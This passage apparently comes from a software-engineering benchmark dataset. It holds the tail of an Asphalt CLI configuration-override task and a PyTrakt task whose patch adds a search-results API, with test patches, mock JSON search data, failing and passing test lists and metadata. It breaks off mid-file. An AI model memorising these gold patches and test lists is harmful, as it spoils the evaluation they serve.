) as run_app:
Path("conf1.yml").write_text(config1)
Path("conf2.yml").write_text(config2)
- result = runner.invoke(cli.run, ["conf1.yml", "conf2.yml"])
+ result = runner.invoke(
+ cli.run,
+ [
+ "conf1.yml",
+ "conf2.yml",
+ "--set",
+ "component.dummyval3=bar",
+ "--set",
+ "component.dummyval4=baz",
+ ],
+ )
assert result.exit_code == 0
assert run_app.call_count == 1
@@ -124,6 +167,8 @@ component:
"type": component_class,
"dummyval1": "alternate",
"dummyval2": 10,
+ "dummyval3": "bar",
+ "dummyval4": "baz",
},
"logging": {"version": 1, "disable_existing_loggers": False},
}
|
Configuration through the command line
Asphalt can currently be configured through YAML files, but it would be great to also support configuration through CLI arguments and options, that would take precedence over YAML files.
|
0.0
|
39ff21a7aa0785f7cdb28eebabd011277080f108
|
[
"tests/test_cli.py::test_run_bad_override",
"tests/test_cli.py::test_run_bad_path",
"tests/test_cli.py::test_run_multiple_configs"
] |
[
"tests/test_cli.py::test_run[safe-default]",
"tests/test_cli.py::test_run[safe-override]",
"tests/test_cli.py::test_run[unsafe-default]",
"tests/test_cli.py::test_run[unsafe-override]",
"tests/test_cli.py::TestServices::test_run_service[server]",
"tests/test_cli.py::TestServices::test_run_service[client]",
"tests/test_cli.py::TestServices::test_service_not_found",
"tests/test_cli.py::TestServices::test_no_service_selected",
"tests/test_cli.py::TestServices::test_bad_services_type",
"tests/test_cli.py::TestServices::test_no_services_defined",
"tests/test_cli.py::TestServices::test_run_only_service",
"tests/test_cli.py::TestServices::test_run_default_service",
"tests/test_cli.py::TestServices::test_service_env_variable",
"tests/test_cli.py::TestServices::test_service_env_variable_override"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-11-21 13:35:39+00:00
|
apache-2.0
| 1,209
|
|
moogar0880__PyTrakt-108
|
diff --git a/HISTORY.rst b/HISTORY.rst
index 250fe12..cbd7617 100644
--- a/HISTORY.rst
+++ b/HISTORY.rst
@@ -1,5 +1,10 @@
Release History
^^^^^^^^^^^^^^^
+2.10.0 (2019-06-25)
++++++++++++++++++++
+
+* Add the ability to return a list of search results instead of their underlying media types (#106)
+
2.9.1 (2019-02-24)
++++++++++++++++++
diff --git a/trakt/__init__.py b/trakt/__init__.py
index f1b1d1e..c731ff7 100644
--- a/trakt/__init__.py
+++ b/trakt/__init__.py
@@ -5,6 +5,6 @@ try:
except ImportError:
pass
-version_info = (2, 9, 1)
+version_info = (2, 10, 0)
__author__ = 'Jon Nappi'
__version__ = '.'.join([str(i) for i in version_info])
diff --git a/trakt/sync.py b/trakt/sync.py
index 39aee61..4e89700 100644
--- a/trakt/sync.py
+++ b/trakt/sync.py
@@ -114,48 +114,64 @@ def remove_from_collection(media):
yield 'sync/collection/remove', media.to_json()
-@get
def search(query, search_type='movie', year=None):
"""Perform a search query against all of trakt's media types
:param query: Your search string
:param search_type: The type of object you're looking for. Must be one of
'movie', 'show', 'episode', or 'person'
+ :param year: This parameter is ignored as it is no longer a part of the
+ official API. It is left here as a valid arg for backwards
+ compatability.
"""
- valids = ('movie', 'show', 'episode', 'person')
- if search_type not in valids:
- raise ValueError('search_type must be one of {}'.format(valids))
- uri = 'search?query={query}&type={type}'.format(
- query=slugify(query), type=search_type)
+ # the new get_search_results expects a list of types, so handle this
+ # conversion to maintain backwards compatability
+ if isinstance(search_type, str):
+ search_type = [search_type]
+ results = get_search_results(query, search_type)
+ return [result.media for result in results]
+
+
+@get
+def get_search_results(query, search_type=None):
+ """Perform a search query against all of trakt's media types
- if year is not None:
- uri += '&year={}'.format(year)
+ :param query: Your search string
+ :param search_type: The types of objects you're looking for. Must be
+ specified as a list of strings containing any of 'movie', 'show',
+ 'episode', or 'person'.
+ """
+ # if no search type was specified, then search everything
+ if search_type is None:
+ search_type = ['movie', 'show', 'episode', 'person']
+ uri = 'search/{type}?query={query}'.format(
+ query=slugify(query), type=','.join(search_type))
data = yield uri
+ # Need to do imports here to prevent circular imports with modules that
+ # need to import Scrobblers
+ results = []
for media_item in data:
extract_ids(media_item)
+ result = SearchResult(media_item['type'], media_item['score'])
+ if media_item['type'] == 'movie':
+ from trakt.movies import Movie
+ result.media = Movie(**media_item.pop('movie'))
+ elif media_item['type'] == 'show':
+ from trakt.tv import TVShow
+ result.media = TVShow(**media_item.pop('show'))
+ elif media_item['type'] == 'episode':
+ from trakt.tv import TVEpisode
+ show = media_item.pop('show')
+ result.media = TVEpisode(show.get('title', None),
+ **media_item.pop('episode'))
+ elif media_item['type'] == 'person':
+ from trakt.people import Person
+ result.media = Person(**media_item.pop('person'))
+ results.append(result)
- # Need to do imports here to prevent circular imports with modules that
- # need to import Scrobblers
- if search_type == 'movie':
- from trakt.movies import Movie
- yield [Movie(**d.pop('movie')) for d in data]
- elif search_type == 'show':
- from trakt.tv import TVShow
- yield [TVShow(**d.pop('show')) for d in data]
- elif search_type == 'episode':
- from trakt.tv import TVEpisode
- episodes = []
- for episode in data:
- show = episode.pop('show')
- extract_ids(episode['episode'])
- episodes.append(TVEpisode(show.get('title', None),
- **episode['episode']))
- yield episodes
- elif search_type == 'person':
- from trakt.people import Person
- yield [Person(**d.pop('person')) for d in data]
+ yield results
@get
@@ -269,3 +285,20 @@ class Scrobbler(object):
scrobbling the :class:`Scrobller`'s *media* object
"""
self.finish()
+
+
+class SearchResult(object):
+ """A SearchResult is an individual result item from the trakt.tv search
+ API. It wraps a single media entity whose type is indicated by the type
+ field.
+ """
+ def __init__(self, type, score, media=None):
+ """Create a new :class:`SearchResult` instance
+
+ :param type: The type of media object contained in this result.
+ :param score: The search result relevancy score of this item.
+ :param media: The wrapped media item returned by a search.
+ """
+ self.type = type
+ self.score = score
+ self.media = media
|
moogar0880/PyTrakt
|
490b465291cb546a903160007aa2eacc85cd4d7c
|
diff --git a/tests/mock_data/search.json b/tests/mock_data/search.json
index 8bd87b2..1cd4a2c 100644
--- a/tests/mock_data/search.json
+++ b/tests/mock_data/search.json
@@ -1,36 +1,21 @@
{
- "search?query=batman&type=movie": {
+ "search/movie?query=batman": {
"GET": [
{"type":"movie","score":85.67655,"movie":{"title":"Batman","overview":"The Dark Knight of Gotham City begins his war on crime with his first major enemy being the clownishly homicidal Joker, who has seized control of Gotham's underworld.","year":1989,"images":{"poster":{"full":"https://walter.trakt.us/images/movies/000/000/224/posters/original/8a5816fc0b.jpg","medium":"https://walter.trakt.us/images/movies/000/000/224/posters/medium/8a5816fc0b.jpg","thumb":"https://walter.trakt.us/images/movies/000/000/224/posters/thumb/8a5816fc0b.jpg"},"fanart":{"full":"https://walter.trakt.us/images/movies/000/000/224/fanarts/original/cbc5557201.jpg","medium":"https://walter.trakt.us/images/movies/000/000/224/fanarts/medium/cbc5557201.jpg","thumb":"https://walter.trakt.us/images/movies/000/000/224/fanarts/thumb/cbc5557201.jpg"}},"ids":{"trakt":224,"slug":"batman-1989","imdb":"tt0096895","tmdb":268}}},
{"type":"movie","score":85.67655,"movie":{"title":"Batman","overview":"The Dynamic Duo faces four super-villains who plan to hold the world for ransom with the help of a secret invention that instantly dehydrates people.","year":1966,"images":{"poster":{"full":"https://walter.trakt.us/images/movies/000/001/794/posters/original/4a4f6031b0.jpg","medium":"https://walter.trakt.us/images/movies/000/001/794/posters/medium/4a4f6031b0.jpg","thumb":"https://walter.trakt.us/images/movies/000/001/794/posters/thumb/4a4f6031b0.jpg"},"fanart":{"full":"https://walter.trakt.us/images/movies/000/001/794/fanarts/original/493d7c70a3.jpg","medium":"https://walter.trakt.us/images/movies/000/001/794/fanarts/medium/493d7c70a3.jpg","thumb":"https://walter.trakt.us/images/movies/000/001/794/fanarts/thumb/493d7c70a3.jpg"}},"ids":{"trakt":1794,"slug":"batman-1966","imdb":"tt0060153","tmdb":2661}}}
]
},
- "search?query=batman&type=movie&year=1966": {
- "GET": [
- {"type":"movie","score":85.67655,"movie":{"title":"Batman","overview":"The Dynamic Duo faces four super-villains who plan to hold the world for ransom with the help of a secret invention that instantly dehydrates people.","year":1966,"images":{"poster":{"full":"https://walter.trakt.us/images/movies/000/001/794/posters/original/4a4f6031b0.jpg","medium":"https://walter.trakt.us/images/movies/000/001/794/posters/medium/4a4f6031b0.jpg","thumb":"https://walter.trakt.us/images/movies/000/001/794/posters/thumb/4a4f6031b0.jpg"},"fanart":{"full":"https://walter.trakt.us/images/movies/000/001/794/fanarts/original/493d7c70a3.jpg","medium":"https://walter.trakt.us/images/movies/000/001/794/fanarts/medium/493d7c70a3.jpg","thumb":"https://walter.trakt.us/images/movies/000/001/794/fanarts/thumb/493d7c70a3.jpg"}},"ids":{"trakt":1794,"slug":"batman-1966","imdb":"tt0060153","tmdb":2661}}}
- ]
- },
- "search?query=batman&type=show": {
+ "search/show?query=batman": {
"GET": [
{"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/002/273/posters/medium/6a2568c755.jpg", "full": "https://walter.trakt.us/images/shows/000/002/273/posters/original/6a2568c755.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/273/posters/thumb/6a2568c755.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/002/273/fanarts/medium/7d42efbf73.jpg", "full": "https://walter.trakt.us/images/shows/000/002/273/fanarts/original/7d42efbf73.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/273/fanarts/thumb/7d42efbf73.jpg"}}, "ids": {"trakt": 2273, "tvrage": 2719, "tvdb": 77871, "slug": "batman", "imdb": "tt0059968", "tmdb": 2287}, "overview": "Wealthy entrepreneur Bruce Wayne and his ward Dick Grayson lead a double life: they are actually crime fighting duo Batman and Robin. A secret Batpole in the Wayne mansion leads to the Batcave, where Police Commissioner Gordon often calls with the latest emergency threatening Gotham City. Racing the the scene of the crime in the Batmobile, Batman and Robin must (with the help of their trusty Bat-utility-belt) thwart the efforts of a variety of master criminals, including The Riddler, The Joker, Catwoman, and The Penguin.", "title": "Batman", "year": 1966, "status": "ended"}, "score": 78.2283}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/000/512/posters/medium/e953162fe9.jpg", "full": "https://walter.trakt.us/images/shows/000/000/512/posters/original/e953162fe9.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/512/posters/thumb/e953162fe9.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/000/512/fanarts/medium/d6792a2797.jpg", "full": "https://walter.trakt.us/images/shows/000/000/512/fanarts/original/d6792a2797.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/512/fanarts/thumb/d6792a2797.jpg"}}, "ids": {"trakt": 512, "tvrage": 2722, "tvdb": 75417, "slug": "batman-beyond", "imdb": "tt0147746", "tmdb": 513}, "overview": "It's been years since Batman was last seen and Bruce Wayne secludes himself away from the resurgence of crime in Gotham. After discovering Bruce's secret identity, troubled teenager Terry McGinnis dons the mantle of Batman. With Bruce supervising him, Terry battles criminals in a futuristic Gotham and brings hope to its citizens.", "title": "Batman Beyond", "year": 1999, "status": "ended"}, "score": 55.877357}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/002/009/posters/medium/09023ee66d.jpg", "full": "https://walter.trakt.us/images/shows/000/002/009/posters/original/09023ee66d.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/009/posters/thumb/09023ee66d.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/002/009/fanarts/medium/256651c6be.jpg", "full": "https://walter.trakt.us/images/shows/000/002/009/fanarts/original/256651c6be.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/009/fanarts/thumb/256651c6be.jpg"}}, "ids": {"trakt": 2009, "tvrage": 5602, "tvdb": 73180, "slug": "the-batman", "imdb": "tt0398417", "tmdb": 2022}, "overview": "A young Bruce Wayne is in his third year of trying to establish himself as Batman, protector of Gotham City. He is in his mid-twenties, just finding his way as protector, defender and Caped Crusader, while balancing his public persona as billionaire bachelor Bruce Wayne. Living in Gotham, a metropolis where shadows run long and deep, beneath elevated train tracks, this younger Batman will confront updated takes of familiar foes - meeting each member of his classic Rogue\"s Gallery for the first time. From the likes of Joker, Penguin, Catwoman, Mr. Freeze, Riddler and Man-Bat, among others, the war on crime jumps to the next level with a new arsenal at the Dark Knight\"s disposal, all operated and linked by an advanced remote-controlled invention he dubs the \"Bat-Wave.\" ", "title": "The Batman", "year": 2004, "status": "ended"}, "score": 55.877357}, {"type": "show", "show": {"images": {"poster": {"medium": null, "full": null, "thumb": null}, "fanart": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 102664, "tvrage": null, "tvdb": 301558, "slug": "batman-unlimited", "imdb": null, "tmdb": null}, "overview": "A webseries began airing on DC Kids' YouTube channel on May 4, 2015.", "title": "Batman Unlimited", "year": 2015, "status": "returning series"}, "score": 55.877357}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/081/374/posters/medium/9f2c978ded.jpg", "full": "https://walter.trakt.us/images/shows/000/081/374/posters/original/9f2c978ded.jpg", "thumb": "https://walter.trakt.us/images/shows/000/081/374/posters/thumb/9f2c978ded.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/081/374/fanarts/medium/9f2c978ded.jpg", "full": "https://walter.trakt.us/images/shows/000/081/374/fanarts/original/9f2c978ded.jpg", "thumb": "https://walter.trakt.us/images/shows/000/081/374/fanarts/thumb/9f2c978ded.jpg"}}, "ids": {"trakt": 81374, "tvrage": null, "tvdb": 287484, "slug": "lego-batman", "imdb": null, "tmdb": null}, "overview": "Batman prides himself on being a loner, a totally self sufficient one-man band. He is understandably irritated when his nightly cleanup of Gotham City villains is interrupted by Superman, who pesters Batman to join his new Super-Hero team, the Justice League. After Batman makes it quite clear to the Man of Steel that his invitation has been declined, Superman flies off disappointed … whereupon he is overcome with a strange energy and vanishes! As costumed Super-Villains begin vanishing one-by-one at the hand of a mysterious enemy, the Dark Knight must free the newly-formed Justice League from a powerful foe. But can Batman learn the value of being a team-player before the Justice League is lost forever?", "title": "Lego Batman", "year": 2014, "status": "returning series"}, "score": 55.877357}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/041/472/posters/medium/3211da0751.jpg", "full": "https://walter.trakt.us/images/shows/000/041/472/posters/original/3211da0751.jpg", "thumb": "https://walter.trakt.us/images/shows/000/041/472/posters/thumb/3211da0751.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/041/472/fanarts/medium/cda4ae8fab.jpg", "full": "https://walter.trakt.us/images/shows/000/041/472/fanarts/original/cda4ae8fab.jpg", "thumb": "https://walter.trakt.us/images/shows/000/041/472/fanarts/thumb/cda4ae8fab.jpg"}}, "ids": {"trakt": 41472, "tvrage": null, "tvdb": 258331, "slug": "beware-the-batman", "imdb": "", "tmdb": 41676}, "overview": "The series is set during Bruce Wayne's early years as the Batman, following his initial period of battling organized crime. Over the course of the season, he hones his skills with the assistance of his butler, Alfred Pennyworth. Bruce is introduced to Alfred's goddaughter, Tatsu Yamashiro. Tatsu is a martial arts swordsmaster hired to act as Bruce's bodyguard, but also recruited to act as a superhero partner to Batman.", "title": "Beware the Batman", "year": 2013, "status": "returning series"}, "score": 44.701885}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/002/085/posters/medium/391f332b37.jpg", "full": "https://walter.trakt.us/images/shows/000/002/085/posters/original/391f332b37.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/085/posters/thumb/391f332b37.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/002/085/fanarts/medium/ab8d2d1b46.jpg", "full": "https://walter.trakt.us/images/shows/000/002/085/fanarts/original/ab8d2d1b46.jpg", "thumb": "https://walter.trakt.us/images/shows/000/002/085/fanarts/thumb/ab8d2d1b46.jpg"}}, "ids": {"trakt": 2085, "tvrage": 2721, "tvdb": 76168, "slug": "batman-the-animated-series", "imdb": "tt0103359", "tmdb": 2098}, "overview": "Batman The Animated Series was a cartoon that premiered on September 5, 1992, based on the comic series created by Bob Kane, as well as the Burton movie adaptations. The series focused on the adventures of the alter ego of millionaire Bruce Wayne, Batman, a dark vigilante hero who defends Gotham City from a variety of creative and psychotic villains. The highly successful series merged stylish animation and fantastic storytelling more in the style of radio plays than typical cartoons.", "title": "Batman: The Animated Series", "year": 1992, "status": "ended"}, "score": 39.11415}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/004/601/posters/medium/56bb90f61e.jpg", "full": "https://walter.trakt.us/images/shows/000/004/601/posters/original/56bb90f61e.jpg", "thumb": "https://walter.trakt.us/images/shows/000/004/601/posters/thumb/56bb90f61e.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/004/601/fanarts/medium/a3ee2e1ec3.jpg", "full": "https://walter.trakt.us/images/shows/000/004/601/fanarts/original/a3ee2e1ec3.jpg", "thumb": "https://walter.trakt.us/images/shows/000/004/601/fanarts/thumb/a3ee2e1ec3.jpg"}}, "ids": {"trakt": 4601, "tvrage": null, "tvdb": 77084, "slug": "the-new-batman-adventures", "imdb": "tt0118266", "tmdb": 4625}, "overview": "Also known as Batman Gotham Knights, this series takes place two years after the last episode of Batman: The Animated Series. Batman has continued to fight crime in Gotham City, but there have been some changes. Dick Grayson has become Nightwing; Tim Drake has taken over the role of Robin; and Batgirl has become apart of Batman's team. But the Dark Knight's greatest villains continue to plague Gotham City, so not everything has changed. This series aired alongside Superman as part of The New Batman/Superman Adventures on the WB. First Telecast: September 13, 1997Last Telecast: January 16, 1999 Episodes: 24 Color episodes (24 half-hour episodes, 2 Direct-to Video Movies) ", "title": "The New Batman Adventures", "year": 1997, "status": "ended"}, "score": 39.11415}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/031/611/posters/medium/d969363d90.jpg", "full": "https://walter.trakt.us/images/shows/000/031/611/posters/original/d969363d90.jpg", "thumb": "https://walter.trakt.us/images/shows/000/031/611/posters/thumb/d969363d90.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/031/611/fanarts/medium/66fab2b401.jpg", "full": "https://walter.trakt.us/images/shows/000/031/611/fanarts/original/66fab2b401.jpg", "thumb": "https://walter.trakt.us/images/shows/000/031/611/fanarts/thumb/66fab2b401.jpg"}}, "ids": {"trakt": 31611, "tvrage": null, "tvdb": 248509, "slug": "the-adventures-of-batman", "imdb": "tt0062544", "tmdb": 31749}, "overview": "The adventures of Batman, with Robin, the Boy Wonder!Batman and Robin, the Dynamic Duo against crime and corruption, whose real identities as millionaire philanthropist Bruce Wayne and his young ward Dick Grayson and known only to Alfred, the faithful butler.Ever alert, they respond swiftly to a signal from the police, and moments later, from the secret Batcave deep beneath Wayne Manor, they roar out to protect life, limb and property as Batman and Robin, caped crimefighters!Batman and Robin, scourge of Gotham City's kooky criminals: The Joker, Clown Prince of Crime - The Penguin, pudgy purveyor of perfidy - and the cool, cruel, Mr. Freeze!Watch out, villains, here come... Batman and Robin!", "title": "The Adventures of Batman", "year": 1968, "status": "ended"}, "score": 39.11415}, {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/061/637/posters/medium/a889cb95b2.jpg", "full": "https://walter.trakt.us/images/shows/000/061/637/posters/original/a889cb95b2.jpg", "thumb": "https://walter.trakt.us/images/shows/000/061/637/posters/thumb/a889cb95b2.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/061/637/fanarts/medium/d873f0ed83.jpg", "full": "https://walter.trakt.us/images/shows/000/061/637/fanarts/original/d873f0ed83.jpg", "thumb": "https://walter.trakt.us/images/shows/000/061/637/fanarts/thumb/d873f0ed83.jpg"}}, "ids": {"trakt": 61637, "tvrage": null, "tvdb": 93341, "slug": "batman-the-1943-serial", "imdb": "tt0035665", "tmdb": null}, "overview": "Batman was a 15-chapter serial released in 1943 by Columbia Pictures. The serial starred Lewis Wilson as Batman and Douglas Croft as Robin. J. Carrol Naish played the villain, an original character named Dr. Daka. Rounding out the cast were Shirley Patterson as Linda Page (Bruce Wayne's love interest), and William Austin as Alfred. The plot is based on Batman, a US government agent, attempting to defeat the Japanese agent Dr. Daka, at the height of World War II.", "title": "Batman: The 1943 Serial", "year": 1943, "status": "ended"}, "score": 39.11415}
]
},
- "search?query=batman&type=show&year=1999": {
- "GET": [
- {"type": "show", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/000/512/posters/medium/e953162fe9.jpg", "full": "https://walter.trakt.us/images/shows/000/000/512/posters/original/e953162fe9.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/512/posters/thumb/e953162fe9.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/000/512/fanarts/medium/d6792a2797.jpg", "full": "https://walter.trakt.us/images/shows/000/000/512/fanarts/original/d6792a2797.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/512/fanarts/thumb/d6792a2797.jpg"}}, "ids": {"trakt": 512, "tvrage": 2722, "tvdb": 75417, "slug": "batman-beyond", "imdb": "tt0147746", "tmdb": 513}, "overview": "It's been years since Batman was last seen and Bruce Wayne secludes himself away from the resurgence of crime in Gotham. After discovering Bruce's secret identity, troubled teenager Terry McGinnis dons the mantle of Batman. With Bruce supervising him, Terry battles criminals in a futuristic Gotham and brings hope to its citizens.", "title": "Batman Beyond", "year": 1999, "status": "ended"}, "score": 55.877357}
- ]
- },
- "search?query=batman&type=episode": {
+ "search/episode?query=batman": {
"GET": [
{"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/000/900/posters/medium/d67bbc0a62.jpg", "full": "https://walter.trakt.us/images/shows/000/000/900/posters/original/d67bbc0a62.jpg", "thumb": "https://walter.trakt.us/images/shows/000/000/900/posters/thumb/d67bbc0a62.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/000/900/fanarts/medium/1eae79bc72.jpg", "full": null, "thumb": "https://walter.trakt.us/images/shows/000/000/900/fanarts/thumb/1eae79bc72.jpg"}}, "year": "1987", "ids": {"trakt": 900, "slug": "french-saunders"}}, "episode": {"images": {"screenshot": {"medium": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/medium/5bd7342a6a.jpg", "full": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/original/5bd7342a6a.jpg", "thumb": "https://walter.trakt.us/images/episodes/000/059/025/screenshots/thumb/5bd7342a6a.jpg"}}, "title": "Batman", "season": 5, "number": 4, "ids": {"trakt": 59025, "tvrage": 64781, "tmdb": null, "imdb": "", "tvdb": 165596}}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/063/200/posters/medium/4f5ec381c4.jpg", "full": "https://walter.trakt.us/images/shows/000/063/200/posters/original/4f5ec381c4.jpg", "thumb": "https://walter.trakt.us/images/shows/000/063/200/posters/thumb/4f5ec381c4.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/063/200/fanarts/medium/4f5ec381c4.jpg", "full": null, "thumb": "https://walter.trakt.us/images/shows/000/063/200/fanarts/thumb/4f5ec381c4.jpg"}}, "year": "2008", "ids": {"trakt": 63200, "slug": "hey-ash-whatcha-playin"}}, "episode": {"images": {"screenshot": {"medium": "https://walter.trakt.us/images/episodes/001/058/895/screenshots/medium/5f6e4ee8fe.jpg", "full": "https://walter.trakt.us/images/episodes/001/058/895/screenshots/original/5f6e4ee8fe.jpg", "thumb": "https://walter.trakt.us/images/episodes/001/058/895/screenshots/thumb/5f6e4ee8fe.jpg"}}, "ids": {"trakt": 1058895, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4412148}, "overview": "Arkham's criminals don't stand a chance against the world's greatest detective, Ashly Burch.", "number": 15, "season": 4, "title": "Batman"}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/004/968/posters/medium/beec80b1c2.jpg", "full": "https://walter.trakt.us/images/shows/000/004/968/posters/original/beec80b1c2.jpg", "thumb": "https://walter.trakt.us/images/shows/000/004/968/posters/thumb/beec80b1c2.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/004/968/fanarts/medium/0918fab718.jpg", "full": null, "thumb": "https://walter.trakt.us/images/shows/000/004/968/fanarts/thumb/0918fab718.jpg"}}, "ids": {"trakt": 4968, "slug": "biography"}, "year": "1987", "title": "Biography"}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 1617094, "tvrage": null, "tmdb": 0, "imdb": null, "tvdb": 4358502}, "overview": "A history of the campy classic '60s TV series \"Batman\", starring Adam West and Burt Ward, who are on hand to comment. Included: screen tests and clips of memorable scenes. Also commenting is executive producer William Dozier; and Batmobile customizer George Barris. ", "number": 2, "season": 2003, "title": "Batman"}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/079/142/posters/medium/ecf7fa7ec3.jpg", "full": "https://walter.trakt.us/images/shows/000/079/142/posters/original/ecf7fa7ec3.jpg", "thumb": "https://walter.trakt.us/images/shows/000/079/142/posters/thumb/ecf7fa7ec3.jpg"}, "fanart": {"medium": null, "full": null, "thumb": null}}, "year": "1969", "ids": {"trakt": 79142, "slug": "bad-days"}}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 1304962, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4571070}, "overview": "Batman doesn't really have bad days, but he definitely has bad nights..", "number": 9, "season": 1, "title": "Batman"}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/073/361/posters/medium/df4f1c96c2.jpg", "full": "https://walter.trakt.us/images/shows/000/073/361/posters/original/df4f1c96c2.jpg", "thumb": "https://walter.trakt.us/images/shows/000/073/361/posters/thumb/df4f1c96c2.jpg"}, "fanart": {"medium": null, "full": null, "thumb": null}}, "year": "2005", "ids": {"trakt": 73361, "slug": "snl-digital-shorts"}}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "title": "Batman", "season": 7, "number": 6, "ids": {"trakt": 1227579, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4670467}}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": null, "full": null, "thumb": null}, "fanart": {"medium": null, "full": null, "thumb": null}}, "year": "2009", "ids": {"trakt": 94515, "slug": "3-2009"}}, "episode": {"images": {"screenshot": {"medium": "https://walter.trakt.us/images/episodes/001/690/018/screenshots/medium/f333de513d.jpg", "full": "https://walter.trakt.us/images/episodes/001/690/018/screenshots/original/f333de513d.jpg", "thumb": "https://walter.trakt.us/images/episodes/001/690/018/screenshots/thumb/f333de513d.jpg"}}, "title": "BATMAN!!!", "season": 2010, "number": 55, "ids": {"trakt": 1690018, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4599451}}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": null, "full": null, "thumb": null}, "fanart": {"medium": null, "full": null, "thumb": null}}, "year": "1998", "ids": {"trakt": 96440, "slug": "joulukalenteri-tonttu-toljanterin-joulupulma"}}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "title": "Batman", "season": 1, "number": 3, "ids": {"trakt": 1766428, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4681124}}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": null, "full": null, "thumb": null}, "fanart": {"medium": null, "full": null, "thumb": null}}, "year": "2002", "ids": {"trakt": 14649, "slug": "cheat"}}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 535228, "tvrage": 356329, "tmdb": 526964, "imdb": "", "tvdb": 143833}, "overview": "Endless summer", "number": 1, "season": 1, "title": "Batman"}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": "https://walter.trakt.us/images/shows/000/078/744/posters/medium/ee26d1337b.jpg", "full": "https://walter.trakt.us/images/shows/000/078/744/posters/original/ee26d1337b.jpg", "thumb": "https://walter.trakt.us/images/shows/000/078/744/posters/thumb/ee26d1337b.jpg"}, "fanart": {"medium": "https://walter.trakt.us/images/shows/000/078/744/fanarts/medium/ee26d1337b.jpg", "full": null, "thumb": "https://walter.trakt.us/images/shows/000/078/744/fanarts/thumb/ee26d1337b.jpg"}}, "year": "2012", "ids": {"trakt": 78744, "slug": "revansch"}}, "episode": {"images": {"screenshot": {"medium": "https://walter.trakt.us/images/episodes/001/302/992/screenshots/medium/7b86b4bbe3.jpg", "full": "https://walter.trakt.us/images/episodes/001/302/992/screenshots/original/7b86b4bbe3.jpg", "thumb": "https://walter.trakt.us/images/episodes/001/302/992/screenshots/thumb/7b86b4bbe3.jpg"}}, "ids": {"trakt": 1302992, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 4770106}, "overview": "As a kid you maybe sold your NES to afford the upcoming SNES. Victor is certainly one of them. 20 years later he visits his parents' attic and finds this game. Is this fate?", "number": 10, "season": 1, "title": "Batman"}, "score": 91.11184}, {"type": "episode", "show": {"images": {"poster": {"medium": null, "full": null, "thumb": null}, "fanart": {"medium": null, "full": null, "thumb": null}}, "ids": {"trakt": 102553, "slug": "you-think-you-know-comics"}, "year": "2014", "title": "You Think You Know Comics"}, "episode": {"images": {"screenshot": {"medium": null, "full": null, "thumb": null}}, "title": "Batman", "season": 2014, "number": 2, "ids": {"trakt": 2015951, "tvrage": null, "tmdb": null, "imdb": null, "tvdb": 5357566}}, "score": 91.11184}
]
},
- "search?query=batman&type=episode&year=1987": {
- "GET": [
